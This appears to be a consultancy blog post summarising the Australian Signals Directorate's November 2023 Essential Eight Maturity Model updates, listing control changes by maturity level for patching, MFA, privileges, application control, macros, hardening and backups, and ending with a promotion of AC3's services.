The Australian Signals Directorate (ASD) continuously strives to provide updates of the Essential Eight Maturity Model, looking to protect organisations both government and private against the ever-changing threat landscape, evolving priorities, exploits and strategies of threat actors. The Essential Eight framework uses a risk-based approach, detailing a minimum set of preventative/mitigation strategies that can be implemented and assessed at specific Maturity Levels (ML). Although designed to protect Microsoft Windows-based internet-connected networks, the framework can be applied to non-Microsoft Windows systems such as Linux or enterprise mobility systems and cloud services. It’s worth noting however that specific mitigation strategies will not be appliable for non-Microsoft Windows systems.

The origins of the Essential Eight Maturity Model dates back to February 2010 with the publication of Strategies to Mitigate Cyber Security incidents. This publication was updated in February 2017 defining 37 strategies that were said to have varying degrees of “Relative Security Effectiveness”. Of these 37 strategies 8 were deemed “Essential” and thus become the infamous “Essential Eight”.

The Essential Eight Maturity Model is designed to be implemented as an iterative process requiring organisations to meet each Maturity Level in turn before being able to progress to the next Maturity Level. Organisations should identify and plan for a targeted Maturity Level that is commensurate with their environment, risk appetite or as otherwise required by Policy/Legislation or specific Regulations.

The November 2023 update to the Essential Eight Maturity Model has seen the ASD adopt language from mapped controls within the Informational Security Manual (ISM) allowing for consistency between the two frameworks and the automatic ingestion by governance, compliance and reporting tools within organisations for Essential Eight tracking and reporting.

The Essential Eight Maturity Model and the latest updates are as follows:

1. Patch Applications: Ensuring applications have the latest security updates installed.

Threat actors are becoming savvier. When an application vulnerability and patch becomes public knowledge it creates the perfect conditions for threat actors to opportunistically seek out and exploit individuals, organisations, and systems that remain unpatched. A number of key changes to the Essential Eight Patch Application control have been introduced to combat these opportunistic attacks, creating a proactive and well-structured approach to Patch Application management.

Maturity Level One:

Changes:

  • 48-hour response timeframes for addressing vulnerabilities in online services from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.
  • Conducting vulnerability scanning activities for high-risk software from at least fortnightly to at least weekly.
  • Patching vulnerabilities in high-risk software from within one month to within two weeks.

Maturity Level Two:

Changes: 48-hour response timeframes for addressing vulnerabilities in online services from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.

Maturity Level Three:

Changes: 48-hour response timeframes for addressing vulnerabilities in online services from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.

2. Patch Operating Systems: Ensuring applications have the latest security updates installed.

Vulnerabilities that exist in Operating Systems often have public exploits that are easily accessible by low-sophisticated threat actors and can cause catastrophic damage by motivated threat actors that hold a more refined tool and skill set. The ASD has come to recognise the need for a consistent approach to applying patches for Operating Systems and/or applying compensating controls, ensuring that implementation is done within a reasonable timeframe. There have been a number of significant changes to the Patch Operating System Essential Eight control significantly reducing the window of opportunity for threat actors.

Maturity Level One:

Changes: 48-hour response timeframes for addressing vulnerabilities in operating systems of internet-facing servers and internet-facing network devices from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.

Maturity Level Two:

Changes:

  • 48-hour response timeframes for addressing vulnerabilities in operating systems of internet-facing servers and internet-facing network devices from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.
  • Conducting vulnerability scanning activities for operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from at least weekly to at least fortnightly.
  • Patching vulnerabilities in operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from within two weeks to within one month.

Maturity Level Three:

Changes:

  • 48-hour response timeframes for addressing vulnerabilities in operating systems of internet-facing servers and internet-facing network devices from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.
  • Conducting vulnerability scanning activities for operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from at least weekly to at least fortnightly.
  • Patching vulnerabilities in operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from within two weeks to within one month.

Additions:

  • Vulnerability scanner be used at least fortnightly to identify missing patches or updates for vulnerabilities in drivers.
  • Vulnerability scanner be used at least fortnightly to identify missing patches or updates for vulnerabilities in firmware.
  • Patches, updates or other vendor mitigations for vulnerabilities in drivers be applied within 48 hours of release when vulnerabilities are assessed as critical by vendors or when working exploits exist.
  • Patches, updates or other vendor mitigations for vulnerabilities in drivers be applied within one month of release when vulnerabilities are assessed as non-critical by vendors and no working exploits exist.
  • Patches, updates or other vendor mitigations for vulnerabilities in firmware be applied within 48 hours of release when vulnerabilities are assessed as critical by vendors or when working exploits exist.
  • Patches, updates or other vendor mitigations for vulnerabilities in firmware be applied within one month of release when vulnerabilities are assessed as non-critical by vendors and no working exploits exist.
3. Multi-Factor Authentication: Ensuring that multiple methods of authentication are provided to restrict unauthorised access.

Multi-factor authentication (MFA) is one of the most effective controls to prevent threat actors from gaining access to an application, service, or system. If implemented effectively MFA can makes it exceptionally difficult for threat actors to steal credentials and progress along the cyber kill chain.

MFA requires use of two or more different methods of authentication:

  • Something the user knows (e.g., a password)
  • Something the user has (e.g., a security token or smartphone)
  • Something the user is (e.g., fingerprint of facial recognition)

MFA Maturity level Two and Three now requires the use of phishing-resistant MFA such as security keys, smart cards, passkeys or FIDO2 (Fast Identity Online) which facilitates password-less authentication. Interestingly, biometrics such as fingerprints on their own are considered a weak form of MFA, unless used to unlock another authentication factor such as a one-time-pad generator app on a smartphone.

Maturity Level One:

Changes: Removing the caveat that customers of online customer services that process, store or communicate sensitive customer data can easily opt-out of using multi-factor authentication.

Additions: Multi-factor authentication uses either: something users have and something users know, or something users have that is unlocked by something users know or are.

Maturity Level Two:

Changes:

  • Removing the caveat that customers of online customer services that process, store or communicate sensitive customer data can easily opt-out of using multi-factor authentication.
  • Event log retention from local logged to centralised logging.

Additions:

  • Multi-factor authentication be used to authenticate unprivileged users of systems to their devices.
  • Multi-factor authentication used for authenticating users of online services be phishing-resistant.
  • Multi-factor authentication used for authenticating customers of online customer services provide a phishing-resistant option.
  • Multi-factor authentication used for authenticating users of systems to their devices be phishing-resistant.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

Changes:

  • Removing the caveat that customers of online customer services that process, store or communicate sensitive customer data can easily opt-out of using multi-factor authentication.
  • The implementation of multi-factor authentication from important data repositories to all data repositories, with prioritisation of important data repositories being encouraged.

Additions: Multi-factor authentication be used to authenticate unprivileged users of systems to their devices.

4. Restrict Administrative Privileges: Minimising the number of people able to effect controls.

The principles of ‘Least Privilege’ and ‘Need to Know’ are becoming more applicable, ensuing consistency in processes related to granting, controlling, and rescinding privileged access to applications and systems. Recommendations for organisations include restricting internet access for privileged service accounts and ensuring passwords are long, unique, unpredictable, and managed. ASD have also recommended that event logs are monitored and that any modification or deletion only occur if authorisation is granted.

Maturity Level One:

Changes: The types of privileged accounts that can access the internet from only privileged service accounts to all privileged accounts explicitly authorised to do so.

Additions:

  • Requests for privileged access to data repositories are validated when first requested.
  • Privileged accounts that have been explicitly authorised to access the internet are strictly limited to only what is required for users and services to undertake their duties.

Maturity Level Two:

Changes:

  • The types of privileged accounts that can access the internet from only privileged service accounts to all privileged accounts explicitly authorised to do so.
  • The types of privileged accounts that can access the internet from only privileged service accounts to all privileged accounts explicitly authorised to do so.

Additions:

  • That requests for privileged access to data repositories are validated when first requested.
  • That privileged access to data repositories are disabled after 12 months unless revalidated.
  • That privileged accounts that have been explicitly authorised to access the internet are strictly limited to only what is required for users and services to undertake their duties.
  • Credentials for break glass accounts are long, unique, unpredictable and managed.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

Changes: The types of privileged accounts that can access the internet from no privileged accounts to all privileged accounts explicitly authorised to do so.

Additions:

  • Requests for privileged access to data repositories are validated when first requested.
  • Privileged access to data repositories are disabled after 12 months unless revalidated.
  • Privileged access to data repositories are limited to only what is required for users and services to undertake their duties.
  • Privileged accounts that have been explicitly authorised to access the internet are strictly limited to only what is required for users and services to undertake their duties.
  • Secure Admin Workstations are used in the performance of administrative activities.
  • Credentials for break glass accounts are long, unique, unpredictable and managed.
  • Microsoft Windows’s memory integrity functionality be enabled.
  • Microsoft Windows’s Local Security Authority protection functionality be enabled.
5. Application Control: Preventing unauthorised software from running on a system.

The use of applications has become synonymous with our daily lives. Applications are often downloaded to facilitate efficiencies and simplicity in our day-to-day work, however without careful consideration or awareness of potential risks it creates opportunity for threat actors to run malicious scripts and executables within a system. ASD has encouraged the use of Application Control by implementing Microsoft’s recommended application blocklist, ensuring that all Applications are downloaded from reputable sources, only use Applications that align to business need and conducting annual reviews of Application control rulesets to prevent the execution of unauthorised software on a system.

Maturity Level One:

Changes: The implementation of application control from using NTFS permissions to using an application control solution, either in-built for an operating system or an equivalent third-party vendor solution.

Maturity Level Two:

Changes: Event log retention from local logged to centralised logging.

Additions:

  • Microsoft’s recommended application blocklist be implemented.
  • Application control rulesets are validated at least annually.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

No significant change.

6. Restrict Microsoft Office Macros: Ensuring that controls are in place to prevent unauthorised software from running through Office Macros

Macros are small programs that automate repetitive tasks in Office applications such as PowerPoint, Word and Excel. Threat Actors have been known to use Macros to steal sensitive information and/or spread malware. The most notable change for this control by ASD relates to removing the requirement for logging macro executions and ensuring that Microsoft Office macros are digitally signed with V3 signatures. It is important to note that application control solutions do not control the execution of macros as they run within Microsoft Applications.

Maturity Level One:

No significant change.

Maturity Level Two:

Changes: Removing the requirement for allowed and blocked Microsoft Office macro events to be logged.

Maturity Level Three:

Changes: Removing the requirement for allowed and blocked Microsoft Office macro events to be logged.

Additions:

  • Microsoft Office macros are checked to ensure they are free of malicious code before being digitally signed or placed within Trusted Locations.
  • Microsoft Office macros digitally signed by signatures other than V3 signatures are prevented from being enabled via the Message Bar or Backstage View.
7. User Application Hardening: Securing software applications to prevent the exploitation of vulnerabilities.

User Application Hardening can be achieved through configuring security settings for software applications such as web browsers and office productivity. By limiting permissions and capabilities of Applications the attack surface of an organisation can be significantly reduced. ASD recommends removing or disabling Internet Explorer 11 (IE11) as Microsoft ceased support for IE11 on 15 June 2022. Threat actors have been known to specifically target IE11 as it contains significant vulnerabilities. Other user Application Hardening recommendations include disabling PowerShell 2.0, implementing Attack Surface Reduction Rules and configuring Event Logs that are monitored.

Maturity Level One:

Changes: Internet Explorer 11 from not processing content from the internet to being disabled or removed.

Maturity Level Two:

Changes:

  • Internet Explorer 11 from not processing content from the internet to being disabled or removed.
  • Hardening guidance from implementing ASD or vendor hardening guidance to implementing ASD and vendor hardening guidance, with the most restrictive requirements taking precedence when conflicts occur.
  • PowerShell event log collection from application control events associated with blocked PowerShell scripts to PowerShell module logging, script block logging and transcription events.
  • Event log retention from local logged to centralised logging.

Additions:

  • Logging of command line process creation events.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

Changes:

  • Hardening guidance from implementing ASD or vendor hardening guidance to implementing ASD and vendor hardening guidance, with the most restrictive requirements taking precedence when conflicts occur.
  • PowerShell event log collection from application control events associated with blocked PowerShell scripts to PowerShell module logging, script block logging and transcription events.

Additions: Logging of command line process creation events.

8. Regular Backups: Ensuring the expedited recovery from incidents – namely ransomware/destructive attacks.

Backups are a critical component of an organisations Business Continuity Planning (BCP) and Disaster Recovery (DR) processes. Although there have been no significant changes to this control, ASD have emphasised the importance of making sure that backups are commensurate with business critically and business continuity requirements and that routine testing of backups occurs to verify the reliability and efficiency of BPC and DR requirements.

Maturity Level One:

No significant change.

Maturity Level Two:

No significant change.

Maturity Level Three:

No significant change.

So what next?

Cybersecurity is highly dynamic and requires a proactive and adaptive approach to ensure that individuals and organisations align with evolving threat landscapes. Continuous education, regular assessments, and a commitment to staying informed about the latest recommendations is essential maintaining effective Cybersecurity.

Assess gaps to uplift, prioritise, and ensure you understand the controls and how they apply.

Plan to implement, keep it pragmatic and workable for your business but understand that some changes will cause ways of working to change.

Education, make sure your teams are aware of what the changes mean to their day-to-day roles, functions, and requirements.

Regular monitoring, proactive measures, and a comprehensive security strategy will help you build a resilient cybersecurity posture. Build use cases from violations, ensure there is optimal coverage, and that business continuity and disaster recovery plans are robust.

And if you need help, work with the experts such as AC3 to ensure that you aren’t leaving your business exposed. They can often provide a broader perspective on how to correctly and effectively implement the controls and ensure both increased security and increased value from your existing investments.